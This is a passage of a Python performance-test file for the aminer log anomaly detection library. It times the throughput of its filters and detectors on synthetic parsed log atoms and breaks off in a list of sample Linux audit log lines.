EventSequenceDetector from aminer.analysis.HistogramAnalysis import ModuloTimeBinDefinition, HistogramData, HistogramAnalysis from aminer.analysis.TimeCorrelationViolationDetector import CorrelationRule, EventClassSelector, TimeCorrelationViolationDetector from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust from aminer.analysis.Rules import PathExistsMatchRule from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector from aminer.analysis.ParserCount import ParserCount from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector from aminer.analysis.MatchFilter import MatchFilter from aminer.analysis.VariableTypeDetector import VariableTypeDetector from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from unit.TestBase import TestBase import time import random from time import process_time from _io import StringIO import timeit import pickle class AnalysisComponentsPerformanceTest(TestBase): """These unittests test the performance of all analysis 
components."""
    # Format of one result line: component name, average atoms per waiting_time, the per-iteration
    # list and a description of the test setup.
    result_string = 'The %s could in average handle %d LogAtoms %s with %s\n'
    # Accumulated result text of all run_* methods; printed once in tearDownClass.
    result = ''
    # How often every measurement is repeated.
    iterations = 2
    # Time budget (seconds) that every result is normalised to.
    waiting_time = 1
    # Common prefix of the parser paths used by most tests.
    integerd = 'integer/d'
    different_paths = '%d different path(s).'
    different_attributes = '%d different attribute(s).'

    @classmethod
    def tearDownClass(cls) -> None:
        """Run the TestBase tearDownClass method and print the results."""
        super(AnalysisComponentsPerformanceTest, cls).tearDownClass()
        print('\nwaiting time: %d seconds' % cls.waiting_time)
        print(cls.result)

    def setUp(self) -> None:
        """Set up needed variables."""
        TestBase.setUp(self)
        self.output_stream = StringIO()
        self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream)

    def run_atom_filters_match_path_filter(self, number_of_paths: int) -> None:
        """Run the performance tests for AtomFilters.MatchPathFilter.

        A SubhandlerFilter with number_of_paths MatchPathFilters (paths integer/d0 .. integer/d<n-1>) is
        built per iteration. The worst case feeds a path that no filter handles (integer/d<n>), so every
        filter is consulted; the best case feeds integer/d0. Each case is timed over 10000 atoms and
        scaled to atoms per waiting_time; the result line holds the mean of both cases.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            new_match_path_detector = NewMatchPathDetector(self.aminer_config, [
                self.stream_printer_event_handler], 'Default', True)
            subhandler_filter = SubhandlerFilter([], stop_when_handled_flag=True)
            i = 0
            while i < number_of_paths:
                match_path_filter = MatchPathFilter([(self.integerd + str(i), new_match_path_detector)], None)
                subhandler_filter.add_handler(match_path_filter, stop_when_handled_flag=True)
                i = i + 1
            t = round(time.time(), 3)
            # worst case: integer/d<number_of_paths> is registered with no filter
            decimal_integer_value_me = DecimalIntegerValueModelElement(
                'd' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(123456789).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_path_filter)
            # timeit runs the lambda right here, so the later rebinding of log_atom is harmless
            worst_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000)
            # best case: integer/d0 is handled by the first filter
            decimal_integer_value_me = DecimalIntegerValueModelElement(
                'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(123456789).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_path_filter)
            best_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000)
            results[z] = int((worst_case + best_case) / 2)
            z = z + 1
            avg = avg + (worst_case + best_case) / 2
        avg = int(avg / self.iterations)
        # append to the class attribute so tearDownClass can print all results at once
        type(self).result = self.result + self.result_string % (
            subhandler_filter.__class__.__name__, avg, results, '%d different %ss with a %s.' % (
                number_of_paths, match_path_filter.__class__.__name__, new_match_path_detector.__class__.__name__))

    def run_atom_filters_match_value_filter(self, number_of_paths: int) -> None:
        """Run the performance tests for AtomFilters.MatchValueFilter.

        Like run_atom_filters_match_path_filter, but every MatchValueFilter dispatches through a dictionary
        of 1000000 integer keys that all map to the same NewMatchPathDetector. Worst case feeds the
        unregistered path integer/d<n>, best case integer/d0.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            new_match_path_detector = NewMatchPathDetector(self.aminer_config, [
                self.stream_printer_event_handler], 'Default', True)
            subhandler_filter = SubhandlerFilter([], stop_when_handled_flag=True)
            i = 0
            dictionary = {}
            # large value -> handler table so the filter's lookup cost is part of the measurement
            while i < 1000000:
                dictionary[i] = new_match_path_detector
                i = i + 1
            i = 0
            while i < number_of_paths:
                match_value_filter = MatchValueFilter(self.integerd + str(i % number_of_paths), dictionary, None)
                subhandler_filter.add_handler(match_value_filter, stop_when_handled_flag=True)
                i = i + 1
            t = round(time.time(), 3)
            # worst case
            decimal_integer_value_me = DecimalIntegerValueModelElement(
                'd' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(123456789).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_value_filter)
            worst_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000)
            # best case
            decimal_integer_value_me = DecimalIntegerValueModelElement(
                'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(123456789).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_value_filter)
            best_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000)
            results[z] = int((worst_case + best_case) / 2)
            z = z + 1
            avg = avg + (worst_case + best_case) / 2
        avg = int(avg / self.iterations)
        type(self).result = self.result + self.result_string % (
            subhandler_filter.__class__.__name__, avg, results, '%d different %ss with a dictionary of %ss.' % (
                number_of_paths, match_value_filter.__class__.__name__, new_match_path_detector.__class__.__name__))

    def run_new_match_path_detector(self, number_of_paths: int) -> None:
        """Run the performance tests for NewMatchPathDetector.

        Atoms cycling through number_of_paths different paths are fed until the accumulated handling time
        reaches waiting_time / 10; the count is multiplied by 10 to give atoms per waiting_time.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            new_match_path_detector = NewMatchPathDetector(self.aminer_config, [
                self.stream_printer_event_handler], 'Default', True)
            t = round(time.time(), 3)
            measured_time = 0
            i = 0
            while measured_time < self.waiting_time / 10:
                decimal_integer_value_me = DecimalIntegerValueModelElement(
                    'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                    DecimalIntegerValueModelElement.PAD_TYPE_NONE)
                match_context = MatchContext(str(i).encode())
                match_element = decimal_integer_value_me.get_match_element('integer', match_context)
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_detector)
                measured_time += timeit.timeit(lambda: new_match_path_detector.receive_atom(log_atom), number=1)
                i += 1
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            new_match_path_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths)

    def run_enhanced_new_match_path_value_combo_detector(self, number_of_paths: int) -> None:
        """Run the performance tests for EnhancedNewMatchPathValueComboDetector.

        The detector watches number_of_paths paths. Worst case feeds the unregistered path
        integer/d<n>, best case integer/d0; both are timed over 10000 atoms and averaged.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            i = 0
            path_list = []
            while i < number_of_paths:
                path_list.append(self.integerd + str(i % number_of_paths))
                i = i + 1
            enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(
                self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, True)
            t = round(time.time(), 3)
            # worst case
            decimal_integer_value_me = DecimalIntegerValueModelElement(
                'd' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(123456789).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, enhanced_new_match_path_value_combo_detector)
            worst_case = self.waiting_time / (
                timeit.timeit(lambda: enhanced_new_match_path_value_combo_detector.receive_atom(log_atom), number=10000) / 10000)
            # best case
            decimal_integer_value_me = DecimalIntegerValueModelElement(
                'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(123456789).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, enhanced_new_match_path_value_combo_detector)
            best_case = self.waiting_time / (
                timeit.timeit(lambda: enhanced_new_match_path_value_combo_detector.receive_atom(log_atom), number=10000) / 10000)
            results[z] = int((worst_case + best_case) / 2)
            z = z + 1
            avg = avg + (worst_case + best_case) / 2
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            enhanced_new_match_path_value_combo_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths)

    def run_histogram_analysis(self, number_of_paths: int, amplifier) -> None:
        """Run the performance tests for HistogramAnalysis.

        A day (86400 s) is split into number_of_paths modulo-time bins; the analysis reports after
        amplifier * waiting_time seconds. Atoms with random timestamps are fed until the accumulated
        handling time reaches waiting_time / 10, scaled to atoms per waiting_time.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 86400 / number_of_paths, 0, 1, number_of_paths, False)
            histogram_data = HistogramData('match/crontab', modulo_time_bin_definition)
            histogram_analysis = HistogramAnalysis(
                self.aminer_config, [(histogram_data.property_path, modulo_time_bin_definition)], amplifier * self.waiting_time,
                [self.stream_printer_event_handler], False, 'Default')
            i = 0
            measured_time = 0
            t = time.time()
            while measured_time < self.waiting_time / 10:
                # random offset so the atoms spread over the bins
                rand = random.randint(0, 100000)
                match_element = MatchElement('match/crontab', str(t + rand).encode(), t + rand, None)
                log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + i, histogram_analysis)
                measured_time += timeit.timeit(lambda: histogram_analysis.receive_atom(log_atom), number=1)
                i = i + 1
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            histogram_analysis.__class__.__name__, avg, results, '%d bin(s) and output after %d elements.' % (
                number_of_paths, amplifier * self.waiting_time))

    def run_match_value_average_change_detector(self, number_of_paths: int) -> None:
        """Run the performance tests for MatchValueAverageChangeDetector.

        Every watched path is first primed with four values (t, t+0.1, t+0.2, t+10). The "worst case"
        then feeds the last registered path, the "best case" the first one; both are timed over 10000
        atoms and averaged.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            i = 0
            path_list = []
            while i < number_of_paths:
                path_list.append(self.integerd + str(i % number_of_paths))
                i = i + 1
            t = time.time()
            match_value_average_change_detector = MatchValueAverageChangeDetector(self.aminer_config, [
                self.stream_printer_event_handler], None, path_list, 2, t, False, 'Default')
            i = 0
            # priming: four timestamped values per path before the measurement starts
            while i < number_of_paths:
                match_element = MatchElement(self.integerd + str(i), b'%d' % t, t, None)
                log_atom = LogAtom(
                    match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector)
                match_value_average_change_detector.receive_atom(log_atom)
                match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 0.1), t + 0.1, None)
                log_atom = LogAtom(
                    match_element.get_match_object(), ParserMatch(match_element), t + 0.1, match_value_average_change_detector)
                match_value_average_change_detector.receive_atom(log_atom)
                match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 0.2), t + 0.2, None)
                log_atom = LogAtom(
                    match_element.get_match_object(), ParserMatch(match_element), t + 0.2, match_value_average_change_detector)
                match_value_average_change_detector.receive_atom(log_atom)
                match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 10), t + 10, None)
                log_atom = LogAtom(
                    match_element.get_match_object(), ParserMatch(match_element), t + 10, match_value_average_change_detector)
                match_value_average_change_detector.receive_atom(log_atom)
                i = i + 1
            t = time.time()
            # worst case: last registered path
            match_element = MatchElement(self.integerd + str(number_of_paths - 1), b'%d' % t, t, None)
            log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector)
            worst_case = self.waiting_time / (
                timeit.timeit(lambda: match_value_average_change_detector.receive_atom(log_atom), number=10000) / 10000)
            # best case: first registered path
            match_element = MatchElement(self.integerd + str(0), b'%d' % t, t, None)
            log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector)
            best_case = self.waiting_time / (
                timeit.timeit(lambda: match_value_average_change_detector.receive_atom(log_atom), number=10000) / 10000)
            results[z] = int((worst_case + best_case) / 2)
            z = z + 1
            avg = avg + (worst_case + best_case) / 2
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            match_value_average_change_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths)

    def run_match_value_stream_writer(self, number_of_paths: int) -> None:
        """Run the performance tests for MatchValueStreamWriter.

        Builds a SequenceModelElement of alternating integer / ' Euro ' elements (half of
        number_of_paths each), parses one matching byte string and times the writer on that atom
        over 10000 calls.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            i = 0
            path_list = []
            parsing_model = []
            while i < number_of_paths / 2:
                path_list.append('match/integer/d' + str(i % number_of_paths))
                path_list.append('match/integer/s' + str(i % number_of_paths))
                parsing_model.append(
                    DecimalIntegerValueModelElement('d' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                                                    DecimalIntegerValueModelElement.PAD_TYPE_NONE))
                parsing_model.append(FixedDataModelElement('s' + str(i % number_of_paths), b' Euro '))
                i = i + 1
            sequence_model_element = SequenceModelElement('integer', parsing_model)
            match_value_stream_writer = MatchValueStreamWriter(self.output_stream, path_list, b';', b'-')
            t = time.time()
            data = b''
            # one "<j> Euro " pair per sequence element
            for j in range(1, int(number_of_paths / 2) + number_of_paths % 2 + 1):
                data = data + str(j).encode() + b' Euro '
            match_context = MatchContext(data)
            match_element = sequence_model_element.get_match_element('match', match_context)
            log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, match_value_stream_writer)
            results[z] = int(self.waiting_time / (
                timeit.timeit(lambda: match_value_stream_writer.receive_atom(log_atom), number=10000) / 10000))
            z = z + 1
            avg = avg + results[z - 1]
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            match_value_stream_writer.__class__.__name__, avg, results, self.different_paths % number_of_paths)

    def run_missing_match_path_value_detector(self, number_of_paths: int) -> None:
        """Run the performance tests for MissingMatchPathValueDetector.

        A MissingMatchPathListValueDetector watches number_of_paths paths (check interval 3600 s,
        realert interval 86400 s). Worst case feeds the last registered path, best case the first;
        both are timed over 10000 atoms and averaged.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            i = 0
            path_list = []
            while i < number_of_paths:
                path_list.append(self.integerd + str(i % number_of_paths))
                i = i + 1
            missing_match_path_list_value_detector = MissingMatchPathListValueDetector(
                self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, 3600, 86400)
            t = time.time()
            # worst case
            decimal_integer_value_me = DecimalIntegerValueModelElement(
                'd' + str(number_of_paths - 1), DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(1).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, missing_match_path_list_value_detector)
            worst_case = self.waiting_time / (
                timeit.timeit(lambda: missing_match_path_list_value_detector.receive_atom(log_atom), number=10000) / 10000)
            # best case
            decimal_integer_value_me = DecimalIntegerValueModelElement(
                'd' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(1).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, missing_match_path_list_value_detector)
            best_case = self.waiting_time / (
                timeit.timeit(lambda: missing_match_path_list_value_detector.receive_atom(log_atom), number=10000) / 10000)
            # NOTE(review): unlike the sibling tests this result is not int()-cast, so the list prints floats
            results[z] = (worst_case + best_case) / 2
            z = z + 1
            avg = avg + (worst_case + best_case) / 2
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            missing_match_path_list_value_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths)

    def run_new_match_path_value_combo_detector(self, number_of_paths: int) -> None:
        """Run the performance tests for NewMatchPathValueComboDetector.

        Atoms cycle through number_of_paths paths with values 0..99; they are fed until the accumulated
        handling time reaches waiting_time / 10 and the count is scaled to atoms per waiting_time.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            i = 0
            path_list = []
            while i < number_of_paths:
                path_list.append(self.integerd + str(i % number_of_paths))
                i = i + 1
            new_match_path_value_combo_detector = NewMatchPathValueComboDetector(
                self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, True)
            t = time.time()
            measured_time = 0
            i = 0
            while measured_time < self.waiting_time / 10:
                decimal_integer_value_me = DecimalIntegerValueModelElement(
                    'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                    DecimalIntegerValueModelElement.PAD_TYPE_NONE)
                match_context = MatchContext(str(i % 100).encode())
                match_element = decimal_integer_value_me.get_match_element('integer', match_context)
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_value_combo_detector)
                measured_time += timeit.timeit(lambda: new_match_path_value_combo_detector.receive_atom(log_atom), number=1)
                i = i + 1
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            new_match_path_value_combo_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths)

    def run_new_match_path_value_detector(self, number_of_paths: int) -> None:
        """Run the performance tests for NewMatchValueDetector.

        Same feed as run_new_match_path_value_combo_detector (paths cycle over number_of_paths, values
        0..99), measured against a NewMatchPathValueDetector.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            i = 0
            path_list = []
            while i < number_of_paths:
                path_list.append(self.integerd + str(i % number_of_paths))
                i = i + 1
            new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, path_list, [
                self.stream_printer_event_handler], 'Default', True, True)
            t = time.time()
            measured_time = 0
            i = 0
            while measured_time < self.waiting_time / 10:
                decimal_integer_value_me = DecimalIntegerValueModelElement(
                    'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE,
                    DecimalIntegerValueModelElement.PAD_TYPE_NONE)
                match_context = MatchContext(str(i % 100).encode())
                match_element = decimal_integer_value_me.get_match_element('integer', match_context)
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_value_detector)
                measured_time += timeit.timeit(lambda: new_match_path_value_detector.receive_atom(log_atom), number=1)
                i = i + 1
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            new_match_path_value_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths)

    def run_time_correlation_detector(self, number_of_rules: int) -> None:
        """Run the performance tests for TimeCorrelationDetector."""
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            time_correlation_detector = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], number_of_rules,
                                                                'Default', self.waiting_time * 9000, True, True, True, 1, 5)
            t = time.time()
            measured_time = 0
            i = 0
            while measured_time < self.waiting_time / 10:
                decimal_integer_value_me = DecimalIntegerValueModelElement(
                    'd', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
                match_context = MatchContext(str(i % 100).encode())
                match_element = decimal_integer_value_me.get_match_element('integer', match_context)
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, time_correlation_detector)
                measured_time += timeit.timeit(lambda: time_correlation_detector.receive_atom(log_atom), number=1)
                i = i
+ 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( time_correlation_detector.__class__.__name__, avg, results, 'test_count=%d.' % number_of_rules) def run_time_correlation_violation_detector(self, chance): """Run the performance tests for TimeCorrelationViolationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: correlation_rule = CorrelationRule('Correlation', 0, chance, artefact_match_parameters=[('/integer/d0', '/integer/d1')]) a_class_selector = EventClassSelector('Selector1', [correlation_rule], None) b_class_selector = EventClassSelector('Selector2', None, [correlation_rule]) rules = [Rules.PathExistsMatchRule('/integer/d0', a_class_selector), Rules.PathExistsMatchRule('/integer/d1', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector( self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) s = time.time() measured_time = 0 i = 0 decimal_integer_value_me = DecimalIntegerValueModelElement( 'd0', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) while measured_time < self.waiting_time / 10: integer = '/integer' r = random.randint(1, 100) decimal_integer_value_me1 = DecimalIntegerValueModelElement( 'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me1.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, 
ParserMatch(match_element), s + r / 100, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) s = s + r / 100 if r / 100 >= chance: match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) i = i + 1 time_correlation_violation_detector.do_timer(s) i = i + 2 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( time_correlation_violation_detector.__class__.__name__, avg, results, '%d%% chance of not finding an element' % ((1 - chance) * 100)) def run_timestamp_correction_filters(self, number_of_paths): """Run the performance tests for TimestampCorrectionFilters.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([new_match_path_detector]) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, simple_monotonic_timestamp_adjust) measured_time += timeit.timeit(lambda: 
simple_monotonic_timestamp_adjust.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( simple_monotonic_timestamp_adjust.__class__.__name__, avg, results, 'a %s and %d different path(s).' % (new_match_path_detector.__class__.__name__, number_of_paths)) def run_timestamps_unsorted_detector(self, reset_factor): """Run the performance tests for TimestampsUnsortedDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: timestamps_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [ self.stream_printer_event_handler]) s = time.time() i = 0 measured_time = 0 mini = 100 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) r = random.randint(1, 100) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s + min(r, mini), timestamps_unsorted_detector) measured_time += timeit.timeit(lambda: timestamps_unsorted_detector.receive_atom(log_atom), number=1) if mini > r: mini = r else: mini = mini + reset_factor i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( timestamps_unsorted_detector.__class__.__name__, avg, results, 'a reset_factor of %f.' 
% reset_factor) def run_allowlist_violation_detector(self, number_of_paths, modulo_factor): """Run the performance tests for AllowlistViolationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 rules = [] while i < number_of_paths: rules.append(PathExistsMatchRule(self.integerd + str(i % number_of_paths), None)) i = i + 1 allowlist_violation_detector = AllowlistViolationDetector(self.aminer_config, rules, [self.stream_printer_event_handler]) t = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: r = random.randint(1, 100) if r >= modulo_factor: r = 2 else: r = 1 decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % (number_of_paths * r)), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, allowlist_violation_detector) measured_time += timeit.timeit(lambda: allowlist_violation_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( allowlist_violation_detector.__class__.__name__, avg, results, '%d different PathExistsMatchRules and a moduloFactor of %d.' 
% (number_of_paths, modulo_factor)) def run_new_match_id_value_combo_detector(self, min_allowed_time_diff): """Run the performance tests for NewMatchIdValueComboDetector.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00' b' nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' 